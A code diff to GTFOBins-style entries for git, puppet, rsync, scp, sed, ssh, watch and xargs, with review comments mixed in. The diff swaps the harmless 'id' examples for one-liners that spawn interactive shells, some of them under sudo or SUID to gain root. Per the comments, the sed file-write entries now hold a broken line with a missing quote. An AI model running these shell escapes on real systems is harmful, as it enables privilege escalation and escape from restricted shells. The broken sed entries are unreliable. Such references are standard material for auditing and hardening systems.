diff --git a/_gtfobins/git.md b/_gtfobins/git.md index ac0095c..b6b82ad 100644 --- a/_gtfobins/git.md +++ b/_gtfobins/git.md @@ -1,15 +1,9 @@ --- functions: - execute-non-interactive: - - code: | - export PAGER=/usr/bin/id - git -p help + execute-interactive: + - code: PAGER='sh -c "exec sh 0<&1"' git -p help sudo-enabled: - - code: | - export PAGER=/usr/bin/id - sudo -E git -p help + - code: PAGER='sh -c "exec sh 0<&1"' sudo -E git -p help suid-limited: - - code: | - export PAGER=/usr/bin/id - ./git -p help + - code: PAGER='sh -c "exec sh 0<&1"' ./git -p help --- diff --git a/_gtfobins/puppet.md b/_gtfobins/puppet.md index 55f3918..416f606 100644 --- a/_gtfobins/puppet.md +++ b/_gtfobins/puppet.md @@ -1,10 +1,8 @@ --- functions: - execute-non-interactive: - - description: The executed command output shown in the puppet log format. - code: | - export CMD="/usr/bin/id" - puppet apply -e "exec { '$CMD': logoutput => true }" + execute-interactive: + - code: | + puppet apply -e "exec { '/bin/sh -c \"exec sh -i <$(tty) >$(tty) 2>$(tty)\"': }" file-write: - description: The file path must be absolute. code: | @@ -16,8 +14,6 @@ functions: export LFILE=file_to_read puppet filebucket -l diff /dev/null $LFILE sudo-enabled: - - description: The executed command output shown in the puppet log format. - code: | - export CMD="/usr/bin/id" - sudo puppet apply -e "exec { '$CMD': logoutput => true }" + - code: | + sudo puppet apply -e "exec { '/bin/sh -c \"exec sh -i <$(tty) >$(tty) 2>$(tty)\"': }" --- diff --git a/_gtfobins/rsync.md b/_gtfobins/rsync.md index 754d848..7a9d051 100644 --- a/_gtfobins/rsync.md +++ b/_gtfobins/rsync.md 
@@ -1,9 +1,9 @@ --- functions: execute-interactive: - - code: rsync -e 'bash -c "exec 10<&0 11>&1 0<&2 1>&2; sh -i"' 127.0.0.1:/dev/null + - code: rsync -e 'sh -c "sh 0<&2 1>&2"' 127.0.0.1:/dev/null sudo-enabled: - - code: sudo rsync -e 'bash -c "exec 10<&0 11>&1 0<&2 1>&2; sh -i"' 127.0.0.1:/dev/null + - code: sudo rsync -e 'sh -c "sh 0<&2 1>&2"' 127.0.0.1:/dev/null suid-enabled: - - code: ./rsync -e 'bash -p -c "exec 10<&0 11>&1 0<&2 1>&2; sh -i"' 127.0.0.1:/dev/null + - code: ./rsync -e 'sh -p -c "sh 0<&2 1>&2"' 127.0.0.1:/dev/null --- diff --git a/_gtfobins/scp.md b/_gtfobins/scp.md index 832fe00..eba6c8e 100644 --- a/_gtfobins/scp.md +++ b/_gtfobins/scp.md @@ -1,10 +1,9 @@ --- functions: - execute-non-interactive: + execute-interactive: - code: | TF=$(mktemp) - CMD="id" - echo "$CMD" > "$TF" + echo 'sh 0<&2 1>&2' > $TF chmod +x "$TF" scp -S $TF x y: upload: @@ -22,15 +21,13 @@ functions: sudo-enabled: - code: | TF=$(mktemp) - CMD="id" - echo "$CMD" > "$TF" + echo 'sh 0<&2 1>&2' > $TF chmod +x "$TF" sudo scp -S $TF x y: suid-limited: - code: | TF=$(mktemp) - CMD="id" - echo "$CMD" > "$TF" + echo 'sh 0<&2 1>&2' > $TF chmod +x "$TF" ./scp -S $TF a b: --- diff --git a/_gtfobins/sed.md b/_gtfobins/sed.md index be83f84..2560133 100644 --- a/_gtfobins/sed.md +++ b/_gtfobins/sed.md @@ -2,14 +2,14 @@ functions: execute-interactive: - description: GNU version only. Also, this requires `bash`. - code: sed -n "1e bash -c 'exec 10<&0 11>&1 0<&2 1>&2; /bin/sh -i'" /etc/hosts + code: sed -n '1e exec sh 1>&0' /etc/hosts execute-non-interactive: - description: GNU version only. code: sed -n "1e id" /etc/hosts file-write: - code: | LFILE=file_to_write - sed -n "1s/.*/DATA/w $LFILE" /etc/hosts + sed -n '1e exec sh 1>&0 /etc/hosts file-read: - code: | LFILE=file_to_read 
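Review bot: `echo 'sh 0<&2 1>&2' > $TF` in the scp execute-interactive entry drops the double quotes the removed line had around `$TF`, while `chmod +x "$TF"` on the very next line keeps them; quote it consistently, `echo 'sh 0<&2 1>&2' > "$TF"`. The same unquoted form is introduced twice more in the `@@ -22,15 +21,13 @@` hunk (sudo-enabled and suid-limited). Whichever convention the project prefers, the three-line block should at least be uniform within itself.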
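Review bot: The file-write entry in the sed hunk no longer writes a file: the replacement line `sed -n '1e exec sh 1>&0 /etc/hosts` is the execute-interactive command with its closing single quote missing, and `LFILE=file_to_write` directly above it is now assigned but never used. This looks like an accidental edit; the removed `sed -n "1s/.*/DATA/w $LFILE" /etc/hosts` form is what belongs under file-write, and the same unterminated-quote line recurs in the sudo-enabled entry of the `@@ -20,5 +20,5 @@` hunk. Separately, the unchanged descriptions on the execute-interactive and sudo-enabled entries still read `Also, this requires `bash`.`, which appears stale now that the code invokes only `sh`; drop that sentence from both.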
@@ -20,5 +20,5 @@ functions: ./sed -e '' "$LFILE" sudo-enabled: - description: GNU version only. Also, this requires `bash`. - code: sudo sed -n "1e /bin/bash -c 'exec 10<&0 11>&1 0<&2 1>&2; /bin/sh -i'" /etc/hosts + code: sudo sed -n '1e exec sh 1>&0 /etc/hosts --- diff --git a/_gtfobins/ssh.md b/_gtfobins/ssh.md index ffd196f..72a718e 100644 --- a/_gtfobins/ssh.md +++ b/_gtfobins/ssh.md @@ -4,7 +4,7 @@ functions: - description: Reconnecting may help bypassing restricted shells. code: ssh localhost $SHELL --noprofile --norc - description: Spawn interactive shell through ProxyCommand option. - code: ssh -o ProxyCommand="/bin/bash -c 'exec 10<&0 11>&1 0<&2 1>&2; /bin/sh -i'" x + code: ssh -o ProxyCommand=';sh 0<&2 1>&2' x upload: - description: Send local file to a SSH server. code: | @@ -26,5 +26,5 @@ functions: ssh -F $LFILE localhost sudo-enabled: - description: Spawn interactive root shell through ProxyCommand option. - code: sudo ssh -o ProxyCommand="/bin/bash -c 'exec 10<&0 11>&1 0<&2 1>&2; /bin/sh -i'" x + code: sudo ssh -o ProxyCommand=';sh 0<&2 1>&2' x --- diff --git a/_gtfobins/watch.md b/_gtfobins/watch.md index 06b5fbb..d6bdc8e 100644 --- a/_gtfobins/watch.md +++ b/_gtfobins/watch.md @@ -1,12 +1,12 @@ --- functions: - execute-non-interactive: - - code: watch /usr/bin/id + execute-interactive: + - code: watch -x sh -c 'reset; exec sh 1>&0 2>&0' suid-enabled: - description: This keeps the SUID privileges only if the `-x` option is present. - code: ./watch -x /usr/bin/id + code: ./watch -x sh -c 'reset; exec sh 1>&0 2>&0' sudo-enabled: - - code: sudo watch /usr/bin/id + - code: sudo watch -x sh -c 'reset; exec sh 1>&0 2>&0' suid-limited: - - code: ./watch /usr/bin/id + - code: ./watch 'reset; exec sh 1>&0 2>&0' --- diff --git a/_gtfobins/xargs.md b/_gtfobins/xargs.md index 42ec684..0cfd581 100644 --- a/_gtfobins/xargs.md +++ b/_gtfobins/xargs.md 
@@ -3,6 +3,11 @@ functions: execute-interactive: - description: GNU version only. code: xargs -a /dev/null sh + - code: echo x | xargs -Iy sh -c 'exec sh 0<&1' + - description: Read interactively from `stdin`. + code: | + xargs -Ix sh -c 'exec sh 0<&1' + x^D^D file-read: - description: This works as long as the file does not contain the NUL character, also a trailing `$'\n'` is added. The actual `/bin/echo` command is executed. GNU version only. code: |